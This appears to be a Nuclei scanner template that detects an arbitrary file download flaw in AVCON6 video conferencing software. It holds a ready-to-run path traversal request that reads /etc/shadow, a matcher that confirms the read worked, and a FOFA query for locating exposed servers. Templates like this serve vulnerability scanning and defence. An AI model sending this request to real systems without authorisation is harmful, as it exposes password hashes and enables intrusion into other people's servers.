id: avcon6-org-execl-download-arbitrary-file-download

info:
  name: AVCON6 org_execl_download.action file down
  author: SleepingBag945
  severity: medium
  description: |
    华平软件视频会议 AVCON6 存在任意文件下载
  metadata:
    fofa-query: title="AVCON6"
  tags: fileread

http:
  - raw:
      - |
        GET /org_execl_download.action?filename=../../../../../../../../../../../../../etc/shadow  HTTP/1.1
        Host: {{Hostname}}



    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1,"root:*:0")'
        condition: and
